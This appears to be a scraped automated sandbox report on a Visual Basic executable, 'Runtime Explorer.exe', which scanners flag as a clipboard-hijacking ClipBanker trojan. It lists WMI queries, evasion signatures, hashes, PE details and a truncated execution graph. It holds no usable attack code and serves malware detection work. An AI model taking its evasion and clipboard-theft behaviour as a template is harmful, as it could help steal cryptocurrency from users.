              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: Runtime Explorer.exeBinary or memory string: A*\AE:\Desarrollo\FER\vb6\4.0 ALLINONE\Proyecto1.vbp
              Source: Runtime Explorer.exe, 00000000.00000002.699098890.0000000000419000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: @*\AE:\Desarrollo\FER\vb6\4.0 ALLINONE\Proyecto1.vbp
              Source: C:\Users\user\Desktop\Runtime Explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
              Source: C:\Users\user\Desktop\Runtime Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\Runtime Explorer.exeUser Timer Set: Timeout: 100msJump to behavior
              Source: C:\Users\user\Desktop\Runtime Explorer.exeUser Timer Set: Timeout: 100msJump to behavior
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Runtime Explorer.exe, type: SAMPLE
              Source: Yara matchFile source: 0.2.Runtime Explorer.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.Runtime Explorer.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.699080451.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.430713298.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Runtime Explorer.exe PID: 6616, type: MEMORYSTR

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts1
              Windows Management Instrumentation              		Path InterceptionPath Interception1
              Virtualization/Sandbox Evasion              		OS Credential Dumping1
              Query Registry              		Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Software Packing              		LSASS Memory1
              Virtualization/Sandbox Evasion              		Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager2
              System Information Discovery              		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 599518 Sample: Runtime Explorer.exe Startdate: 29/03/2022 Architecture: WINDOWS Score: 68 8 Antivirus / Scanner detection for submitted sample 2->8 10 Multi AV Scanner detection for submitted file 2->10 12 Yara detected Clipboard Hijacker 2->12 5 Runtime Explorer.exe 1 2->5         started        process3 signatures4 14 Uses Windows timers to delay execution 5->14

              Screenshots

              Download Video

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Runtime Explorer.exe74%VirustotalBrowse
              Runtime Explorer.exe40%MetadefenderBrowse
              Runtime Explorer.exe69%ReversingLabsWin32.Trojan.ClipBanker
              Runtime Explorer.exe100%AviraTR/ClipBanker.avslj

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              0.0.Runtime Explorer.exe.400000.0.unpack100%AviraTR/ClipBanker.avsljDownload File

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              No contacted domains info

              World Map of Contacted IPs

              No contacted IP infos

              General Information

              Joe Sandbox Version:34.0.0 Boulder Opal
              Analysis ID:599518
              Start date and time:2022-03-29 19:09:39 +02:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 5m 12s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:Runtime Explorer.exe
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:18
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal68.spyw.evad.winEXE@1/0@0/0
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 99.9% (good quality ratio 94.7%)
              • Quality average: 43.7%
              • Quality standard deviation: 23.9%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 5
              • Number of non-executed functions: 6
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASNs

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              No created / dropped files found

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):4.323322308973506
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.15%
              • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:Runtime Explorer.exe
              File size:155648
              MD5:d42c2456ea9de66a75a29dea464a4e4d
              SHA1:1e8ce36d82aab5d9ae09630bf01a77d92778d603
              SHA256:907e7f7e2ee47c955cf315747ab913b591e9046f51c0f3ba9a6eef696346198e
              SHA512:6132dd5508edf64f2226b729670504d44754443e42139a9a1195764d5a681a24a492e716af309fabb50c041170288d2ce9d79d9dcedddc738ceb483557c0537e
              SSDEEP:768:fIHIzUzS7eXCHPVAfktEtzIpo9TRyG0onSwj6lGT4YEybLlY4aKHR++uVTShUhM7:Q9DCS48h0mvMkDmXPYavc7t
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........A...A...A.......@...(...B.......@...RichA...........................PE..L....n.a............................<.............@

              File Icon

              Icon Hash:00928e8e868eb000

              Static PE Info

              General

              Entrypoint:0x40143c
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              DLL Characteristics:
              Time Stamp:0x61BB6EB4 [Thu Dec 16 16:52:04 2021 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:0a464e2f61945ed36131666607401478
              Instruction
              push 0040C780h
              call 00007F2AC4B010F5h
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              xor byte ptr [eax], al
              add byte ptr [eax], al
              inc eax
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [edx+06h], dl
              and ebp, dword ptr [ebp+4F221CBCh]
              stosb
              pop ecx
              lahf
              jmp far 0000h : F13D4C77h
              add byte ptr [eax], al
              add byte ptr [eax], al
              add dword ptr [eax], eax
              add byte ptr [eax], al
              inc eax
              add byte ptr [ebp+eax+7250086Dh], al
              outsd
              push 00000065h
              arpl word ptr [ecx+esi+00h], si
              add dword ptr [ebp+08h], ebp
              sbb eax, 00000000h
              add byte ptr [eax], al
              add bh, bh
              int3
              xor dword ptr [eax], eax
              add dword ptr [esi], esp
              jbe 00007F2AC4B010D3h
              adc byte ptr [ebp-7ABF11D3h], al
              pop ds
              push es
              cli
              or dword ptr [C9652794h], esi
              dec eax
              shr dword ptr [esi-76BC0799h], FFFFFFA2h
              invd
              das
              call 00007F2B13EA3AD3h
              lodsd
              xor ebx, dword ptr [ecx-48EE309Ah]
              or al, 00h
              stosb
              add byte ptr [eax-2Dh], ah
              xchg eax, ebx
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              jp 00007F2AC4B010B3h
              add byte ptr [eax], al
              push esp
              mov cl, 00h
              add byte ptr [eax], al
              add eax, 726F4600h
              insd
              xor dword ptr [eax], eax
              or eax, 52001001h
              jne 00007F2AC4B01170h
              je 00007F2AC4B0116Bh
              insd
              and byte ptr [ebp+78h], al
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x17b140x28.text
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a0000xb574.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2380x20
              IMAGE_DIRECTORY_ENTRY_IAT0x10000x14c.text
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x171500x18000False0.243204752604data4.79919923332IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              .data0x190000xb240x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
              .rsrc0x1a0000xb5740xc000False0.0899251302083data3.59630796938IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              NameRVASizeTypeLanguageCountry
              RT_ICON0x24c980x8dcPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
              RT_ICON0x20a700x4228dBase III DBT, version number 0, next free block index 40
              RT_ICON0x1e4c80x25a8dBase III DBT, version number 0, next free block index 40
              RT_ICON0x1ca600x1a68dBase III DBT, version number 0, next free block index 40
              RT_ICON0x1b9b80x10a8dBase III DBT, version number 0, next free block index 40
              RT_ICON0x1b0300x988data
              RT_ICON0x1a9780x6b8data
              RT_ICON0x1a5100x468GLS_BINARY_LSB_FIRST
              RT_GROUP_ICON0x1a4980x78data
              RT_VERSION0x1a2400x258dataEnglishUnited States
              DLLImport
              MSVBVM60.DLL_CIcos, _adj_fptan, __vbaStrI4, __vbaVarMove, __vbaVarVargNofree, __vbaFreeVar, __vbaLenBstr, __vbaFreeVarList, _adj_fdiv_m64, __vbaNextEachVar, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaForEachCollAd, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaVarCmpGe, __vbaExitProc, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaBoolVar, __vbaVargVar, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaExitEachColl, __vbaStrCmp, __vbaVarTstEq, __vbaObjVar, DllFunctionCall, __vbaVarLateMemSt, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaVarCat, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarSetVar, __vbaVarAdd, __vbaLateMemCall, __vbaStrToAnsi, __vbaVarDup, __vbaVarLateMemCallLd, __vbaVarCopy, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaForEachVar, _allmul, _CItan, __vbaNextEachCollAd, __vbaAryUnlock, _CIexp, __vbaFreeStr, __vbaFreeObj
              DescriptionData
              Translation0x0409 0x04b0
              InternalNameRuntime Explorer
              FileVersion1.00
              CompanyNameMicrosoft Windows
              ProductNameRuntime Explorer
              ProductVersion1.00
              OriginalFilenameRuntime Explorer.exe

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States

              Network Behavior

              No network behavior found

              Statistics

              CPU Usage

              050100s020406080100

              Click to jump to process

              Memory Usage

              050100s0.00510MB

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:21:10:52
              Start date:29/03/2022
              Path:C:\Users\user\Desktop\Runtime Explorer.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\Runtime Explorer.exe"
              Imagebase:0x400000
              File size:155648 bytes
              MD5 hash:D42C2456EA9DE66A75A29DEA464A4E4D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:Visual Basic
              Yara matches:
              • Rule: JoeSecurity_Clipboard_Hijacker_3, Description: Yara detected Clipboard Hijacker, Source: 00000000.00000002.699080451.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Clipboard_Hijacker_3, Description: Yara detected Clipboard Hijacker, Source: 00000000.00000000.430713298.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
              Reputation:low
              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
              Show Windows behavior

              Section Activities

              Show Windows behavior

              Registry Activities

              Show Windows behavior

              COM Activities

              Show Windows behavior

              Mutex Activities

              Show Windows behavior

              Process Activities

              Show Windows behavior

              Thread Activities

              Show Windows behavior

              Memory Activities

              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
              Show Windows behavior

              Timing Activities

              Show Windows behavior

              Windows UI Activities

              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

              Disassembly

              Execution Graph

              Execution Coverage

              Dynamic/Packed Code Coverage

              Signature Coverage

              Execution Coverage:10.7%
              Dynamic/Decrypted Code Coverage:0.2%
              Signature Coverage:0%
              Total number of Nodes:414
              Total number of Limit Nodes:27
              Show Legend
              Hide Nodes/Edges
              execution_graph 1514 412f1a 1515 412f5f __vbaStrCopy 1514->1515 1545 412c74 1515->1545 1516 412f8f 1517 412f93 __vbaHresultCheckObj 1516->1517 1518 412fa4 __vbaFreeStr 1516->1518 1517->1518 1519 412fba __vbaOnError 1518->1519 1520 41316e __vbaExitProc 1518->1520 1521 412fc9 __vbaNew2 1519->1521 1522 412fd8 1519->1522 1523 41318b __vbaFreeStr __vbaFreeStr 1520->1523 1521->1522 1524 412fff 1522->1524 1525 412fee __vbaHresultCheckObj 1522->1525 1526 413046 __vbaStrMove __vbaFreeObj 1524->1526 1527 413036 __vbaHresultCheckObj 1524->1527 1525->1524 1553 416f91 __vbaStrCopy 1526->1553 1527->1526 1529 413065 __vbaStrMove __vbaStrCmp 1529->1520 1530 413084 1529->1530 1531 41308e __vbaSetSystemError 1530->1531 1532 41309b __vbaNew2 1531->1532 1533 4130aa 1531->1533 1532->1533 1534 4130c0 __vbaHresultCheckObj 1533->1534 1535 4130ca 1533->1535 1534->1535 1536 4130e9 __vbaFreeObj 1535->1536 1537 4130db __vbaHresultCheckObj 1535->1537 1538 4130f9 __vbaNew2 1536->1538 1539 413108 1536->1539 1537->1536 1538->1539 1540 41311e __vbaHresultCheckObj 1539->1540 1541 413128 1539->1541 1540->1541 1542 413164 __vbaFreeObj 1541->1542 1543 413156 __vbaHresultCheckObj 1541->1543 1542->1520 1543->1542 1546 412cb1 16 API calls 1545->1546 1547 412dd4 1546->1547 1548 412e37 __vbaExitProc 1547->1548 1549 412dd8 __vbaLateMemCallLd __vbaVarTstEq __vbaFreeVar 1547->1549 1550 412e65 __vbaFreeObj __vbaFreeObj __vbaFreeStr __vbaFreeObj __vbaFreeObj 1548->1550 1551 412e16 __vbaNextEachCollAd 1549->1551 1552 412e28 __vbaExitEachColl 1549->1552 1550->1516 1551->1547 1552->1548 1554 417005 1553->1554 1555 416ff7 __vbaNew2 1553->1555 1556 417024 __vbaVarCopy __vbaVarDup 1554->1556 1557 417016 __vbaHresultCheckObj 1554->1557 1555->1554 1717 4134fb 11 API calls 1556->1717 1557->1556 1559 417069 __vbaFreeVar 1560 4170b1 __vbaVarDup 1559->1560 1561 417082 __vbaVarDup 1559->1561 1563 4134fb 22 API calls 1560->1563 1722 41372e 11 API calls 1561->1722 1565 4170d3 __vbaFreeVar 1563->1565 1564 4170a4 __vbaFreeVar 1566 417a8f __vbaStrCmp 1564->1566 1567 417110 __vbaVarDup 1565->1567 1568 4170ec __vbaVarDup 1565->1568 1569 417aaa 1566->1569 1570 417aaf __vbaStrCopy 1566->1570 1572 4134fb 22 API calls 1567->1572 1817 416446 11 API calls 1568->1817 1569->1570 1574 417add __vbaFreeVar __vbaFreeObj 1570->1574 1575 417132 __vbaFreeVar 1572->1575 1573 41710e 1573->1564 1574->1529 1576 4171a2 __vbaVarDup 1575->1576 1577 417145 1575->1577 1580 4134fb 22 API calls 1576->1580 1578 417159 1577->1578 1579 41714b __vbaNew2 1577->1579 1585 41717b 1578->1585 1586 41716d __vbaHresultCheckObj 1578->1586 1579->1578 1581 4171ca __vbaFreeVar 1580->1581 1582 4171e3 __vbaVarDup 1581->1582 1583 41720a __vbaVarDup 1581->1583 1822 4166f9 11 API calls 1582->1822 1584 4134fb 22 API calls 1583->1584 1588 41722c __vbaFreeVar 1584->1588 1589 417182 __vbaNew2 1585->1589 1659 417193 1585->1659 1586->1585 1591 417245 __vbaVarDup 1588->1591 1592 41726c __vbaVarDup 1588->1592 1589->1659 1590 417205 1590->1583 1830 414cc1 11 API calls 1591->1830 1594 4134fb 22 API calls 1592->1594 1596 41728e __vbaFreeVar 1594->1596 1595 417267 1595->1592 1599 4172a7 __vbaVarDup 1596->1599 1600 4172ce __vbaVarDup 1596->1600 1597 417a81 __vbaStrMove 1597->1566 1598 417a71 __vbaHresultCheckObj 1598->1597 1921 416a06 11 API calls 1599->1921 1602 4134fb 22 API calls 1600->1602 1603 4172f0 __vbaFreeVar 1602->1603 1605 417360 __vbaVarDup 1603->1605 1606 417303 1603->1606 1604 4172c9 1604->1600 1609 4134fb 22 API calls 1605->1609 1607 417317 1606->1607 1608 417309 __vbaNew2 1606->1608 1613 417339 1607->1613 1614 41732b __vbaHresultCheckObj 1607->1614 1608->1607 1610 417388 __vbaFreeVar 1609->1610 1611 4173f8 __vbaVarDup 1610->1611 1612 41739b 1610->1612 1615 4134fb 22 API calls 1611->1615 1616 4173a1 __vbaNew2 1612->1616 1617 4173af 1612->1617 1618 417340 __vbaNew2 1613->1618 1613->1659 1614->1613 1619 417420 __vbaFreeVar 1615->1619 1616->1617 1622 4173d1 1617->1622 1623 4173c3 __vbaHresultCheckObj 1617->1623 1618->1659 1620 417460 __vbaVarDup 1619->1620 1621 417439 __vbaVarDup 1619->1621 1625 4134fb 22 API calls 1620->1625 1942 416178 11 API calls 1621->1942 1626 4173d8 __vbaNew2 1622->1626 1622->1659 1623->1622 1628 417482 __vbaFreeVar 1625->1628 1626->1659 1627 41745b 1627->1620 1629 4174f2 __vbaVarDup 1628->1629 1630 417495 1628->1630 1633 4134fb 22 API calls 1629->1633 1631 4174a9 1630->1631 1632 41749b __vbaNew2 1630->1632 1637 4174cb 1631->1637 1638 4174bd __vbaHresultCheckObj 1631->1638 1632->1631 1634 41751a __vbaFreeVar 1633->1634 1635 41758a __vbaVarDup 1634->1635 1636 41752d 1634->1636 1639 4134fb 22 API calls 1635->1639 1640 417541 1636->1640 1641 417533 __vbaNew2 1636->1641 1642 4174d2 __vbaNew2 1637->1642 1637->1659 1638->1637 1643 4175b2 __vbaFreeVar 1639->1643 1646 417563 1640->1646 1647 417555 __vbaHresultCheckObj 1640->1647 1641->1640 1642->1659 1644 417622 __vbaVarDup 1643->1644 1645 4175c5 1643->1645 1648 4134fb 22 API calls 1644->1648 1649 4175d9 1645->1649 1650 4175cb __vbaNew2 1645->1650 1651 41756a __vbaNew2 1646->1651 1646->1659 1647->1646 1652 41764a __vbaFreeVar 1648->1652 1656 4175fb 1649->1656 1657 4175ed __vbaHresultCheckObj 1649->1657 1650->1649 1651->1659 1653 4176ba __vbaVarDup 1652->1653 1654 41765d 1652->1654 1658 4134fb 22 API calls 1653->1658 1655 417663 __vbaNew2 1654->1655 1664 417671 1654->1664 1655->1664 1656->1659 1660 417602 __vbaNew2 1656->1660 1657->1656 1661 4176e2 __vbaFreeVar 1658->1661 1659->1597 1659->1598 1660->1659 1662 417752 __vbaVarDup 1661->1662 1663 4176f5 1661->1663 1669 4134fb 22 API calls 1662->1669 1665 417709 1663->1665 1666 4176fb __vbaNew2 1663->1666 1667 417693 1664->1667 1668 417685 __vbaHresultCheckObj 1664->1668 1674 41772b 1665->1674 1675 41771d __vbaHresultCheckObj 1665->1675 1666->1665 1667->1659 1670 41769a __vbaNew2 1667->1670 1668->1667 1671 41777a __vbaFreeVar 1669->1671 1670->1659 1672 4177ea __vbaVarDup 1671->1672 1673 41778d 1671->1673 1676 4134fb 22 API calls 1672->1676 1677 4177a1 1673->1677 1678 417793 __vbaNew2 1673->1678 1674->1659 1679 417732 __vbaNew2 1674->1679 1675->1674 1680 417812 